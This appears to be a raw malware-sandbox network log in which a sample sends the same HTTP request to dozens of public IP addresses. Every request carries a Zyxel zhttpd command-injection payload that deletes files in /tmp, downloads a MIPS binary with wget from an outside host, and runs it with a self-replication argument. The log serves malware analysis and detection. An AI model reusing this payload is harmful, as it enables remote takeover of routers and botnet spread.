                              Mar 31, 2024 08:41:08.543904066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1181192.168.2.13438309.136.103.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543947935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1182192.168.2.1338162221.241.39.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543967009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1183192.168.2.135421857.37.181.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544039011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1184192.168.2.134951025.80.207.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544081926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1185192.168.2.1335902196.198.196.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544135094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1186192.168.2.1358728162.116.37.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544173002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1187192.168.2.1336352200.228.140.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544236898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1188192.168.2.1335526120.175.228.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544239044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1189192.168.2.1348524208.179.103.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544269085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1190192.168.2.1340502180.36.193.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544306993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1191192.168.2.133622045.221.219.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544346094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1192192.168.2.134742890.84.166.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544359922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1193192.168.2.134456423.64.191.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544395924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1194192.168.2.1349680113.220.114.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544437885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1195192.168.2.135336217.87.85.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544488907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1196192.168.2.133913454.56.220.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544513941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1197192.168.2.135050284.132.228.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544538975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1198192.168.2.13534704.146.57.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544572115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1199192.168.2.1359840167.165.62.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544617891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1200192.168.2.13475485.55.1.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544634104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1201192.168.2.134584634.67.174.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544672012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1202192.168.2.135189085.229.118.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544697046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1203192.168.2.1349838150.181.178.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544723988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1204192.168.2.1345888202.111.245.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544735909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1205192.168.2.1352240134.138.113.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544770956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1206192.168.2.133659812.114.49.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544852018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1207192.168.2.1335514198.116.230.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544882059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1208192.168.2.135031292.168.26.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544913054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1209192.168.2.1345640202.127.185.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544924021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1210192.168.2.1337802143.28.20.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.544943094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1211192.168.2.1346048161.80.222.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545016050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1212192.168.2.135194627.240.120.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545042038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1213192.168.2.134020838.30.130.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545090914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1214192.168.2.1342488176.91.75.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545119047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1215192.168.2.1338890163.32.127.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545142889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1216192.168.2.1335460185.32.29.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545171976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1217192.168.2.1333512206.220.246.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545202971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1218192.168.2.1360808105.241.226.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545269966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1219192.168.2.1359364205.170.16.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545308113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1220192.168.2.1349738217.75.170.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545367956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1221192.168.2.133385867.96.61.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545392990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1222192.168.2.1348044132.166.124.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545416117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1223192.168.2.1351700164.45.174.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545440912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1224192.168.2.1343246158.193.252.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545481920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1225192.168.2.1347088190.80.75.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545517921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1226192.168.2.1345960149.208.43.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545591116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1227192.168.2.135795247.248.184.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545591116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1228192.168.2.135288695.129.234.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545603991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1229192.168.2.1350250203.229.193.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545649052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1230192.168.2.1349350123.98.105.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545715094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1231192.168.2.1349204119.138.129.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545746088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1232192.168.2.1350316130.238.42.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545766115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1233192.168.2.133860618.12.214.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545819044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1234192.168.2.1351238210.241.250.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545876980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1235192.168.2.1338480164.34.251.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545908928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1236192.168.2.1358038208.157.25.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545936108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1237192.168.2.134175085.211.22.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.545968056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1238192.168.2.134028247.0.97.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546011925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1239192.168.2.1360970141.21.141.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546041965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1240192.168.2.1342246193.179.194.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546062946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1241192.168.2.1359082150.142.60.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546118975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1242192.168.2.135958414.142.177.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546159983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1243192.168.2.1335914204.211.168.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546183109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1244192.168.2.133733688.205.195.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546219110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1245192.168.2.1336622148.75.0.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546257973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1246192.168.2.135077472.228.43.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546294928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1247192.168.2.133774070.152.224.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546355009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1248192.168.2.1333260131.94.85.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546380043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1249192.168.2.1348606120.49.32.8443
                              TimestampBytes transferredDirectionData
